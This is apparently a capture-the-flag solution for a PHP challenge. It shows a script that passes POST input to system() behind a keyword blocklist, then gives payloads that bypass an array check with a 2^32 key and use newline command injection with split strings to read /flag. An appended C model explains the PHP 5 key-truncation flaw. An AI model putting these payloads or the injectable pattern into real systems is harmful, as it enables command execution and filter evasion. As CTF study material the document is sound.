<?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
}else{
    highlight_file(__FILE__);
}
payload:
stuff[4294967296]=admin&stuff[]=user&num=123%0aa=fl;b=ag;tac /$a$b
stuff[4294967296]=admin&stuff[]=user&num=123%0aca''t /fl''ag
Also

When $arr[0]='admin' is not defined and [4294967296]='admin' is defined instead,
$arr===$array nevertheless returns true,
and $arr[0]!='admin' also returns true.
I don't know why either; just remember it.
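
The behaviour noted above matches an integer-key truncation in the ordered array comparison of old PHP 5 builds on 64-bit platforms: the difference between two 64-bit keys was kept in a 32-bit integer, while element lookup used the full key. The C below is an added, simplified model of that flaw beside a full-width comparison; it is not PHP's source, and `struct bucket`, `compare_truncated`, `compare_full` and `lookup` are hypothetical names.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simplified model of an ordered PHP array slot: integer key and value. */
struct bucket { uint64_t h; const char *val; };

/* Flawed ordered compare: the 64-bit key difference is kept in a 32-bit
 * integer, so two keys that differ by a multiple of 2^32 look identical. */
static int compare_truncated(const struct bucket *a, const struct bucket *b, size_t n) {
    for (size_t i = 0; i < n; i++) {
        int32_t d = (int32_t)(uint32_t)(a[i].h - b[i].h); /* high bits lost */
        if (d != 0) return d;
        int c = strcmp(a[i].val, b[i].val);
        if (c != 0) return c;
    }
    return 0;
}

/* Corrected compare: keys are compared at full width. */
static int compare_full(const struct bucket *a, const struct bucket *b, size_t n) {
    for (size_t i = 0; i < n; i++) {
        if (a[i].h != b[i].h) return a[i].h > b[i].h ? 1 : -1;
        int c = strcmp(a[i].val, b[i].val);
        if (c != 0) return c;
    }
    return 0;
}

/* Element lookup always uses the full 64-bit key. */
static const char *lookup(const struct bucket *a, size_t n, uint64_t key) {
    for (size_t i = 0; i < n; i++)
        if (a[i].h == key) return a[i].val;
    return NULL;
}

/* Constructed data: the script's $array and the posted array from the note. */
static const struct bucket expected[] = { {0, "admin"}, {1, "user"} };
static const struct bucket posted[] = { {4294967296ULL, "admin"}, {4294967297ULL, "user"} };

int main(void) {
    printf("truncated compare: %d\n", compare_truncated(expected, posted, 2));
    printf("full-width compare: %d\n", compare_full(expected, posted, 2));
    printf("posted[0] defined: %s\n", lookup(posted, 2, 0) ? "yes" : "no");
    return 0;
}
```

With full-width key comparison the two arrays no longer compare as identical, so a guard of this form cannot be satisfied by an array that lacks index 0.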
